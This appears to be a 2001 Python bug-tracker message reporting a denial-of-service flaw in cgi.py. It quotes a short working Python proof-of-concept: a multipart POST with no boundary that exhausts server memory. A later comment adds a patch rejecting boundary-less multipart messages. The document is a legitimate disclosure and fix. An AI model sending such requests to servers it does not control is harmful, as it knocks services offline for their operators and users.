[Python-bugs-list] [ python-Bugs-443120 ] denial-of-service attack to cgi.py

noreply@sourceforge.net noreply@sourceforge.net
Sun, 22 Jul 2001 18:48:40 -0700 

Bugs item #443120, was opened at 2001-07-20 09:13
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Guido van Rossum (gvanrossum)
Assigned to: Nobody/Anonymous (nobody)
Summary: denial-of-service attack to cgi.py

Initial Comment:
I got this in the mail:

"""
Subject: Bug in cgi.py, denial-of-service possible
From: Richard Jones <richard@bizarsoftware.com.au>
To: guido@python.org, support@digicool.com
Date: Fri, 20 Jul 2001 17:43:15 +1000

The inner workings of cgi.py are still a mystery to me,
so I can't offer a 
patch. Sorry.

The following code will effect a denial-of-service
against any server running 
cgi.py (and hence Zope).


import httplib
params = '\n'*10
h = httplib.HTTP('localhost', 8080)
h.putrequest('POST', '/')
h.putheader('Content-type', 'multipart/form-data')
h.putheader('Content-length', str(len(params)))
h.endheaders()
h.send(params)


The key here is the missing boundary from the
content-type header. From my 
observation, it seems that cgi.py defaults the boundary
to "" which means 
that it matches boundaries without progressing through
the input - creating 
new FieldStorage instances for each match. The result
is all available RAM 
gobbled up eventually. I recommend testing this on a
system on which you can 
easily kill the server process.



    Richard

-- 
Richard Jones
richard@bizarsoftware.com.au
Senior Software Developer, Bizar Software
(www.bizarsoftware.com.au)
"""


----------------------------------------------------------------------

Comment By: Richard Jones (richard)
Date: 2001-07-22 18:48

Message:
Logged In: YES 
user_id=6405

This is a patch - it's against a patched cgi.py (I've 
applied the fix for "too many open files"). RFC 2046 
requires a boundary argument for the multipart content 
types (http://www.ietf.org/rfc/rfc2046.txt, 5.1.1, second 
paragraph). This patch does fix the given exploit.


*** /usr/lib/python2.1/cgi.py	Tue Jul 10 14:29:37 2001
--- cgi.py	Mon Jul 23 11:37:45 2001
***************
*** 514,519 ****
--- 514,521 ----
          if ctype == 'application/x-www-form-urlencoded':
              self.read_urlencoded()
          elif ctype[:10] == 'multipart/':
+             if not self.innerboundary:
+                 raise ValueError, 'multipart message 
with no boundary'
              self.read_multi(environ, keep_blank_values, 
strict_parsing)
          else:
              self.read_single()



----------------------------------------------------------------------

You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470